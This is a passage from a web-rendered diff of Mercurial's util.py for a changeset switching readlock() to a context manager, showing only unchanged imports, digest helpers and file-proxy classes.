##// END OF EJS Templates
util: use a context manager in readlock()
Matt Harbison -
r39941:4017968f default
parent child Browse files
Show More
@@ -1,3989 +1,3987 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 readlink = platform.readlink
115 readlink = platform.readlink
116 rename = platform.rename
116 rename = platform.rename
117 removedirs = platform.removedirs
117 removedirs = platform.removedirs
118 samedevice = platform.samedevice
118 samedevice = platform.samedevice
119 samefile = platform.samefile
119 samefile = platform.samefile
120 samestat = platform.samestat
120 samestat = platform.samestat
121 setflags = platform.setflags
121 setflags = platform.setflags
122 split = platform.split
122 split = platform.split
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 statisexec = platform.statisexec
124 statisexec = platform.statisexec
125 statislink = platform.statislink
125 statislink = platform.statislink
126 umask = platform.umask
126 umask = platform.umask
127 unlink = platform.unlink
127 unlink = platform.unlink
128 username = platform.username
128 username = platform.username
129
129
130 try:
130 try:
131 recvfds = osutil.recvfds
131 recvfds = osutil.recvfds
132 except AttributeError:
132 except AttributeError:
133 pass
133 pass
134
134
135 # Python compatibility
135 # Python compatibility
136
136
137 _notset = object()
137 _notset = object()
138
138
139 def bitsfrom(container):
139 def bitsfrom(container):
140 bits = 0
140 bits = 0
141 for bit in container:
141 for bit in container:
142 bits |= bit
142 bits |= bit
143 return bits
143 return bits
144
144
145 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # python 2.6 still have deprecation warning enabled by default. We do not want
146 # to display anything to standard user so detect if we are running test and
146 # to display anything to standard user so detect if we are running test and
147 # only use python deprecation warning in this case.
147 # only use python deprecation warning in this case.
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 if _dowarn:
149 if _dowarn:
150 # explicitly unfilter our warning for python 2.7
150 # explicitly unfilter our warning for python 2.7
151 #
151 #
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # However, module name set through PYTHONWARNINGS was exactly matched, so
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 # makes the whole PYTHONWARNINGS thing useless for our usecase.
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 if _dowarn and pycompat.ispy3:
159 if _dowarn and pycompat.ispy3:
160 # silence warning emitted by passing user string to re.sub()
160 # silence warning emitted by passing user string to re.sub()
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 r'mercurial')
162 r'mercurial')
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 DeprecationWarning, r'mercurial')
164 DeprecationWarning, r'mercurial')
165 # TODO: reinvent imp.is_frozen()
165 # TODO: reinvent imp.is_frozen()
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 DeprecationWarning, r'mercurial')
167 DeprecationWarning, r'mercurial')
168
168
169 def nouideprecwarn(msg, version, stacklevel=1):
169 def nouideprecwarn(msg, version, stacklevel=1):
170 """Issue an python native deprecation warning
170 """Issue an python native deprecation warning
171
171
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 """
173 """
174 if _dowarn:
174 if _dowarn:
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 " update your code.)") % version
176 " update your code.)") % version
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178
178
179 DIGESTS = {
179 DIGESTS = {
180 'md5': hashlib.md5,
180 'md5': hashlib.md5,
181 'sha1': hashlib.sha1,
181 'sha1': hashlib.sha1,
182 'sha512': hashlib.sha512,
182 'sha512': hashlib.sha512,
183 }
183 }
184 # List of digest types from strongest to weakest
184 # List of digest types from strongest to weakest
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186
186
187 for k in DIGESTS_BY_STRENGTH:
187 for k in DIGESTS_BY_STRENGTH:
188 assert k in DIGESTS
188 assert k in DIGESTS
189
189
190 class digester(object):
190 class digester(object):
191 """helper to compute digests.
191 """helper to compute digests.
192
192
193 This helper can be used to compute one or more digests given their name.
193 This helper can be used to compute one or more digests given their name.
194
194
195 >>> d = digester([b'md5', b'sha1'])
195 >>> d = digester([b'md5', b'sha1'])
196 >>> d.update(b'foo')
196 >>> d.update(b'foo')
197 >>> [k for k in sorted(d)]
197 >>> [k for k in sorted(d)]
198 ['md5', 'sha1']
198 ['md5', 'sha1']
199 >>> d[b'md5']
199 >>> d[b'md5']
200 'acbd18db4cc2f85cedef654fccc4a4d8'
200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 >>> d[b'sha1']
201 >>> d[b'sha1']
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 >>> digester.preferred([b'md5', b'sha1'])
203 >>> digester.preferred([b'md5', b'sha1'])
204 'sha1'
204 'sha1'
205 """
205 """
206
206
207 def __init__(self, digests, s=''):
207 def __init__(self, digests, s=''):
208 self._hashes = {}
208 self._hashes = {}
209 for k in digests:
209 for k in digests:
210 if k not in DIGESTS:
210 if k not in DIGESTS:
211 raise error.Abort(_('unknown digest type: %s') % k)
211 raise error.Abort(_('unknown digest type: %s') % k)
212 self._hashes[k] = DIGESTS[k]()
212 self._hashes[k] = DIGESTS[k]()
213 if s:
213 if s:
214 self.update(s)
214 self.update(s)
215
215
216 def update(self, data):
216 def update(self, data):
217 for h in self._hashes.values():
217 for h in self._hashes.values():
218 h.update(data)
218 h.update(data)
219
219
220 def __getitem__(self, key):
220 def __getitem__(self, key):
221 if key not in DIGESTS:
221 if key not in DIGESTS:
222 raise error.Abort(_('unknown digest type: %s') % k)
222 raise error.Abort(_('unknown digest type: %s') % k)
223 return nodemod.hex(self._hashes[key].digest())
223 return nodemod.hex(self._hashes[key].digest())
224
224
225 def __iter__(self):
225 def __iter__(self):
226 return iter(self._hashes)
226 return iter(self._hashes)
227
227
228 @staticmethod
228 @staticmethod
229 def preferred(supported):
229 def preferred(supported):
230 """returns the strongest digest type in both supported and DIGESTS."""
230 """returns the strongest digest type in both supported and DIGESTS."""
231
231
232 for k in DIGESTS_BY_STRENGTH:
232 for k in DIGESTS_BY_STRENGTH:
233 if k in supported:
233 if k in supported:
234 return k
234 return k
235 return None
235 return None
236
236
237 class digestchecker(object):
237 class digestchecker(object):
238 """file handle wrapper that additionally checks content against a given
238 """file handle wrapper that additionally checks content against a given
239 size and digests.
239 size and digests.
240
240
241 d = digestchecker(fh, size, {'md5': '...'})
241 d = digestchecker(fh, size, {'md5': '...'})
242
242
243 When multiple digests are given, all of them are validated.
243 When multiple digests are given, all of them are validated.
244 """
244 """
245
245
246 def __init__(self, fh, size, digests):
246 def __init__(self, fh, size, digests):
247 self._fh = fh
247 self._fh = fh
248 self._size = size
248 self._size = size
249 self._got = 0
249 self._got = 0
250 self._digests = dict(digests)
250 self._digests = dict(digests)
251 self._digester = digester(self._digests.keys())
251 self._digester = digester(self._digests.keys())
252
252
253 def read(self, length=-1):
253 def read(self, length=-1):
254 content = self._fh.read(length)
254 content = self._fh.read(length)
255 self._digester.update(content)
255 self._digester.update(content)
256 self._got += len(content)
256 self._got += len(content)
257 return content
257 return content
258
258
259 def validate(self):
259 def validate(self):
260 if self._size != self._got:
260 if self._size != self._got:
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 (self._size, self._got))
262 (self._size, self._got))
263 for k, v in self._digests.items():
263 for k, v in self._digests.items():
264 if v != self._digester[k]:
264 if v != self._digester[k]:
265 # i18n: first parameter is a digest name
265 # i18n: first parameter is a digest name
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 (k, v, self._digester[k]))
267 (k, v, self._digester[k]))
268
268
269 try:
269 try:
270 buffer = buffer
270 buffer = buffer
271 except NameError:
271 except NameError:
272 def buffer(sliceable, offset=0, length=None):
272 def buffer(sliceable, offset=0, length=None):
273 if length is not None:
273 if length is not None:
274 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:offset + length]
275 return memoryview(sliceable)[offset:]
275 return memoryview(sliceable)[offset:]
276
276
277 _chunksize = 4096
277 _chunksize = 4096
278
278
279 class bufferedinputpipe(object):
279 class bufferedinputpipe(object):
280 """a manually buffered input pipe
280 """a manually buffered input pipe
281
281
282 Python will not let us use buffered IO and lazy reading with 'polling' at
282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 the same time. We cannot probe the buffer state and select will not detect
283 the same time. We cannot probe the buffer state and select will not detect
284 that data are ready to read if they are already buffered.
284 that data are ready to read if they are already buffered.
285
285
286 This class let us work around that by implementing its own buffering
286 This class let us work around that by implementing its own buffering
287 (allowing efficient readline) while offering a way to know if the buffer is
287 (allowing efficient readline) while offering a way to know if the buffer is
288 empty from the output (allowing collaboration of the buffer with polling).
288 empty from the output (allowing collaboration of the buffer with polling).
289
289
290 This class lives in the 'util' module because it makes use of the 'os'
290 This class lives in the 'util' module because it makes use of the 'os'
291 module from the python stdlib.
291 module from the python stdlib.
292 """
292 """
293 def __new__(cls, fh):
293 def __new__(cls, fh):
294 # If we receive a fileobjectproxy, we need to use a variation of this
294 # If we receive a fileobjectproxy, we need to use a variation of this
295 # class that notifies observers about activity.
295 # class that notifies observers about activity.
296 if isinstance(fh, fileobjectproxy):
296 if isinstance(fh, fileobjectproxy):
297 cls = observedbufferedinputpipe
297 cls = observedbufferedinputpipe
298
298
299 return super(bufferedinputpipe, cls).__new__(cls)
299 return super(bufferedinputpipe, cls).__new__(cls)
300
300
301 def __init__(self, input):
301 def __init__(self, input):
302 self._input = input
302 self._input = input
303 self._buffer = []
303 self._buffer = []
304 self._eof = False
304 self._eof = False
305 self._lenbuf = 0
305 self._lenbuf = 0
306
306
307 @property
307 @property
308 def hasbuffer(self):
308 def hasbuffer(self):
309 """True is any data is currently buffered
309 """True is any data is currently buffered
310
310
311 This will be used externally a pre-step for polling IO. If there is
311 This will be used externally a pre-step for polling IO. If there is
312 already data then no polling should be set in place."""
312 already data then no polling should be set in place."""
313 return bool(self._buffer)
313 return bool(self._buffer)
314
314
315 @property
315 @property
316 def closed(self):
316 def closed(self):
317 return self._input.closed
317 return self._input.closed
318
318
319 def fileno(self):
319 def fileno(self):
320 return self._input.fileno()
320 return self._input.fileno()
321
321
322 def close(self):
322 def close(self):
323 return self._input.close()
323 return self._input.close()
324
324
325 def read(self, size):
325 def read(self, size):
326 while (not self._eof) and (self._lenbuf < size):
326 while (not self._eof) and (self._lenbuf < size):
327 self._fillbuffer()
327 self._fillbuffer()
328 return self._frombuffer(size)
328 return self._frombuffer(size)
329
329
330 def unbufferedread(self, size):
330 def unbufferedread(self, size):
331 if not self._eof and self._lenbuf == 0:
331 if not self._eof and self._lenbuf == 0:
332 self._fillbuffer(max(size, _chunksize))
332 self._fillbuffer(max(size, _chunksize))
333 return self._frombuffer(min(self._lenbuf, size))
333 return self._frombuffer(min(self._lenbuf, size))
334
334
335 def readline(self, *args, **kwargs):
335 def readline(self, *args, **kwargs):
336 if 1 < len(self._buffer):
336 if 1 < len(self._buffer):
337 # this should not happen because both read and readline end with a
337 # this should not happen because both read and readline end with a
338 # _frombuffer call that collapse it.
338 # _frombuffer call that collapse it.
339 self._buffer = [''.join(self._buffer)]
339 self._buffer = [''.join(self._buffer)]
340 self._lenbuf = len(self._buffer[0])
340 self._lenbuf = len(self._buffer[0])
341 lfi = -1
341 lfi = -1
342 if self._buffer:
342 if self._buffer:
343 lfi = self._buffer[-1].find('\n')
343 lfi = self._buffer[-1].find('\n')
344 while (not self._eof) and lfi < 0:
344 while (not self._eof) and lfi < 0:
345 self._fillbuffer()
345 self._fillbuffer()
346 if self._buffer:
346 if self._buffer:
347 lfi = self._buffer[-1].find('\n')
347 lfi = self._buffer[-1].find('\n')
348 size = lfi + 1
348 size = lfi + 1
349 if lfi < 0: # end of file
349 if lfi < 0: # end of file
350 size = self._lenbuf
350 size = self._lenbuf
351 elif 1 < len(self._buffer):
351 elif 1 < len(self._buffer):
352 # we need to take previous chunks into account
352 # we need to take previous chunks into account
353 size += self._lenbuf - len(self._buffer[-1])
353 size += self._lenbuf - len(self._buffer[-1])
354 return self._frombuffer(size)
354 return self._frombuffer(size)
355
355
356 def _frombuffer(self, size):
356 def _frombuffer(self, size):
357 """return at most 'size' data from the buffer
357 """return at most 'size' data from the buffer
358
358
359 The data are removed from the buffer."""
359 The data are removed from the buffer."""
360 if size == 0 or not self._buffer:
360 if size == 0 or not self._buffer:
361 return ''
361 return ''
362 buf = self._buffer[0]
362 buf = self._buffer[0]
363 if 1 < len(self._buffer):
363 if 1 < len(self._buffer):
364 buf = ''.join(self._buffer)
364 buf = ''.join(self._buffer)
365
365
366 data = buf[:size]
366 data = buf[:size]
367 buf = buf[len(data):]
367 buf = buf[len(data):]
368 if buf:
368 if buf:
369 self._buffer = [buf]
369 self._buffer = [buf]
370 self._lenbuf = len(buf)
370 self._lenbuf = len(buf)
371 else:
371 else:
372 self._buffer = []
372 self._buffer = []
373 self._lenbuf = 0
373 self._lenbuf = 0
374 return data
374 return data
375
375
376 def _fillbuffer(self, size=_chunksize):
376 def _fillbuffer(self, size=_chunksize):
377 """read data to the buffer"""
377 """read data to the buffer"""
378 data = os.read(self._input.fileno(), size)
378 data = os.read(self._input.fileno(), size)
379 if not data:
379 if not data:
380 self._eof = True
380 self._eof = True
381 else:
381 else:
382 self._lenbuf += len(data)
382 self._lenbuf += len(data)
383 self._buffer.append(data)
383 self._buffer.append(data)
384
384
385 return data
385 return data
386
386
387 def mmapread(fp):
387 def mmapread(fp):
388 try:
388 try:
389 fd = getattr(fp, 'fileno', lambda: fp)()
389 fd = getattr(fp, 'fileno', lambda: fp)()
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 except ValueError:
391 except ValueError:
392 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 # if the file is empty, and if so, return an empty buffer.
393 # if the file is empty, and if so, return an empty buffer.
394 if os.fstat(fd).st_size == 0:
394 if os.fstat(fd).st_size == 0:
395 return ''
395 return ''
396 raise
396 raise
397
397
398 class fileobjectproxy(object):
398 class fileobjectproxy(object):
399 """A proxy around file objects that tells a watcher when events occur.
399 """A proxy around file objects that tells a watcher when events occur.
400
400
401 This type is intended to only be used for testing purposes. Think hard
401 This type is intended to only be used for testing purposes. Think hard
402 before using it in important code.
402 before using it in important code.
403 """
403 """
404 __slots__ = (
404 __slots__ = (
405 r'_orig',
405 r'_orig',
406 r'_observer',
406 r'_observer',
407 )
407 )
408
408
409 def __init__(self, fh, observer):
409 def __init__(self, fh, observer):
410 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_orig', fh)
411 object.__setattr__(self, r'_observer', observer)
411 object.__setattr__(self, r'_observer', observer)
412
412
413 def __getattribute__(self, name):
413 def __getattribute__(self, name):
414 ours = {
414 ours = {
415 r'_observer',
415 r'_observer',
416
416
417 # IOBase
417 # IOBase
418 r'close',
418 r'close',
419 # closed if a property
419 # closed if a property
420 r'fileno',
420 r'fileno',
421 r'flush',
421 r'flush',
422 r'isatty',
422 r'isatty',
423 r'readable',
423 r'readable',
424 r'readline',
424 r'readline',
425 r'readlines',
425 r'readlines',
426 r'seek',
426 r'seek',
427 r'seekable',
427 r'seekable',
428 r'tell',
428 r'tell',
429 r'truncate',
429 r'truncate',
430 r'writable',
430 r'writable',
431 r'writelines',
431 r'writelines',
432 # RawIOBase
432 # RawIOBase
433 r'read',
433 r'read',
434 r'readall',
434 r'readall',
435 r'readinto',
435 r'readinto',
436 r'write',
436 r'write',
437 # BufferedIOBase
437 # BufferedIOBase
438 # raw is a property
438 # raw is a property
439 r'detach',
439 r'detach',
440 # read defined above
440 # read defined above
441 r'read1',
441 r'read1',
442 # readinto defined above
442 # readinto defined above
443 # write defined above
443 # write defined above
444 }
444 }
445
445
446 # We only observe some methods.
446 # We only observe some methods.
447 if name in ours:
447 if name in ours:
448 return object.__getattribute__(self, name)
448 return object.__getattribute__(self, name)
449
449
450 return getattr(object.__getattribute__(self, r'_orig'), name)
450 return getattr(object.__getattribute__(self, r'_orig'), name)
451
451
452 def __nonzero__(self):
452 def __nonzero__(self):
453 return bool(object.__getattribute__(self, r'_orig'))
453 return bool(object.__getattribute__(self, r'_orig'))
454
454
455 __bool__ = __nonzero__
455 __bool__ = __nonzero__
456
456
457 def __delattr__(self, name):
457 def __delattr__(self, name):
458 return delattr(object.__getattribute__(self, r'_orig'), name)
458 return delattr(object.__getattribute__(self, r'_orig'), name)
459
459
460 def __setattr__(self, name, value):
460 def __setattr__(self, name, value):
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462
462
463 def __iter__(self):
463 def __iter__(self):
464 return object.__getattribute__(self, r'_orig').__iter__()
464 return object.__getattribute__(self, r'_orig').__iter__()
465
465
466 def _observedcall(self, name, *args, **kwargs):
466 def _observedcall(self, name, *args, **kwargs):
467 # Call the original object.
467 # Call the original object.
468 orig = object.__getattribute__(self, r'_orig')
468 orig = object.__getattribute__(self, r'_orig')
469 res = getattr(orig, name)(*args, **kwargs)
469 res = getattr(orig, name)(*args, **kwargs)
470
470
471 # Call a method on the observer of the same name with arguments
471 # Call a method on the observer of the same name with arguments
472 # so it can react, log, etc.
472 # so it can react, log, etc.
473 observer = object.__getattribute__(self, r'_observer')
473 observer = object.__getattribute__(self, r'_observer')
474 fn = getattr(observer, name, None)
474 fn = getattr(observer, name, None)
475 if fn:
475 if fn:
476 fn(res, *args, **kwargs)
476 fn(res, *args, **kwargs)
477
477
478 return res
478 return res
479
479
480 def close(self, *args, **kwargs):
480 def close(self, *args, **kwargs):
481 return object.__getattribute__(self, r'_observedcall')(
481 return object.__getattribute__(self, r'_observedcall')(
482 r'close', *args, **kwargs)
482 r'close', *args, **kwargs)
483
483
484 def fileno(self, *args, **kwargs):
484 def fileno(self, *args, **kwargs):
485 return object.__getattribute__(self, r'_observedcall')(
485 return object.__getattribute__(self, r'_observedcall')(
486 r'fileno', *args, **kwargs)
486 r'fileno', *args, **kwargs)
487
487
488 def flush(self, *args, **kwargs):
488 def flush(self, *args, **kwargs):
489 return object.__getattribute__(self, r'_observedcall')(
489 return object.__getattribute__(self, r'_observedcall')(
490 r'flush', *args, **kwargs)
490 r'flush', *args, **kwargs)
491
491
492 def isatty(self, *args, **kwargs):
492 def isatty(self, *args, **kwargs):
493 return object.__getattribute__(self, r'_observedcall')(
493 return object.__getattribute__(self, r'_observedcall')(
494 r'isatty', *args, **kwargs)
494 r'isatty', *args, **kwargs)
495
495
496 def readable(self, *args, **kwargs):
496 def readable(self, *args, **kwargs):
497 return object.__getattribute__(self, r'_observedcall')(
497 return object.__getattribute__(self, r'_observedcall')(
498 r'readable', *args, **kwargs)
498 r'readable', *args, **kwargs)
499
499
500 def readline(self, *args, **kwargs):
500 def readline(self, *args, **kwargs):
501 return object.__getattribute__(self, r'_observedcall')(
501 return object.__getattribute__(self, r'_observedcall')(
502 r'readline', *args, **kwargs)
502 r'readline', *args, **kwargs)
503
503
504 def readlines(self, *args, **kwargs):
504 def readlines(self, *args, **kwargs):
505 return object.__getattribute__(self, r'_observedcall')(
505 return object.__getattribute__(self, r'_observedcall')(
506 r'readlines', *args, **kwargs)
506 r'readlines', *args, **kwargs)
507
507
508 def seek(self, *args, **kwargs):
508 def seek(self, *args, **kwargs):
509 return object.__getattribute__(self, r'_observedcall')(
509 return object.__getattribute__(self, r'_observedcall')(
510 r'seek', *args, **kwargs)
510 r'seek', *args, **kwargs)
511
511
512 def seekable(self, *args, **kwargs):
512 def seekable(self, *args, **kwargs):
513 return object.__getattribute__(self, r'_observedcall')(
513 return object.__getattribute__(self, r'_observedcall')(
514 r'seekable', *args, **kwargs)
514 r'seekable', *args, **kwargs)
515
515
516 def tell(self, *args, **kwargs):
516 def tell(self, *args, **kwargs):
517 return object.__getattribute__(self, r'_observedcall')(
517 return object.__getattribute__(self, r'_observedcall')(
518 r'tell', *args, **kwargs)
518 r'tell', *args, **kwargs)
519
519
520 def truncate(self, *args, **kwargs):
520 def truncate(self, *args, **kwargs):
521 return object.__getattribute__(self, r'_observedcall')(
521 return object.__getattribute__(self, r'_observedcall')(
522 r'truncate', *args, **kwargs)
522 r'truncate', *args, **kwargs)
523
523
524 def writable(self, *args, **kwargs):
524 def writable(self, *args, **kwargs):
525 return object.__getattribute__(self, r'_observedcall')(
525 return object.__getattribute__(self, r'_observedcall')(
526 r'writable', *args, **kwargs)
526 r'writable', *args, **kwargs)
527
527
528 def writelines(self, *args, **kwargs):
528 def writelines(self, *args, **kwargs):
529 return object.__getattribute__(self, r'_observedcall')(
529 return object.__getattribute__(self, r'_observedcall')(
530 r'writelines', *args, **kwargs)
530 r'writelines', *args, **kwargs)
531
531
532 def read(self, *args, **kwargs):
532 def read(self, *args, **kwargs):
533 return object.__getattribute__(self, r'_observedcall')(
533 return object.__getattribute__(self, r'_observedcall')(
534 r'read', *args, **kwargs)
534 r'read', *args, **kwargs)
535
535
536 def readall(self, *args, **kwargs):
536 def readall(self, *args, **kwargs):
537 return object.__getattribute__(self, r'_observedcall')(
537 return object.__getattribute__(self, r'_observedcall')(
538 r'readall', *args, **kwargs)
538 r'readall', *args, **kwargs)
539
539
540 def readinto(self, *args, **kwargs):
540 def readinto(self, *args, **kwargs):
541 return object.__getattribute__(self, r'_observedcall')(
541 return object.__getattribute__(self, r'_observedcall')(
542 r'readinto', *args, **kwargs)
542 r'readinto', *args, **kwargs)
543
543
544 def write(self, *args, **kwargs):
544 def write(self, *args, **kwargs):
545 return object.__getattribute__(self, r'_observedcall')(
545 return object.__getattribute__(self, r'_observedcall')(
546 r'write', *args, **kwargs)
546 r'write', *args, **kwargs)
547
547
548 def detach(self, *args, **kwargs):
548 def detach(self, *args, **kwargs):
549 return object.__getattribute__(self, r'_observedcall')(
549 return object.__getattribute__(self, r'_observedcall')(
550 r'detach', *args, **kwargs)
550 r'detach', *args, **kwargs)
551
551
552 def read1(self, *args, **kwargs):
552 def read1(self, *args, **kwargs):
553 return object.__getattribute__(self, r'_observedcall')(
553 return object.__getattribute__(self, r'_observedcall')(
554 r'read1', *args, **kwargs)
554 r'read1', *args, **kwargs)
555
555
556 class observedbufferedinputpipe(bufferedinputpipe):
556 class observedbufferedinputpipe(bufferedinputpipe):
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558
558
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 bypass ``fileobjectproxy``. Because of this, we need to make
560 bypass ``fileobjectproxy``. Because of this, we need to make
561 ``bufferedinputpipe`` aware of these operations.
561 ``bufferedinputpipe`` aware of these operations.
562
562
563 This variation of ``bufferedinputpipe`` can notify observers about
563 This variation of ``bufferedinputpipe`` can notify observers about
564 ``os.read()`` events. It also re-publishes other events, such as
564 ``os.read()`` events. It also re-publishes other events, such as
565 ``read()`` and ``readline()``.
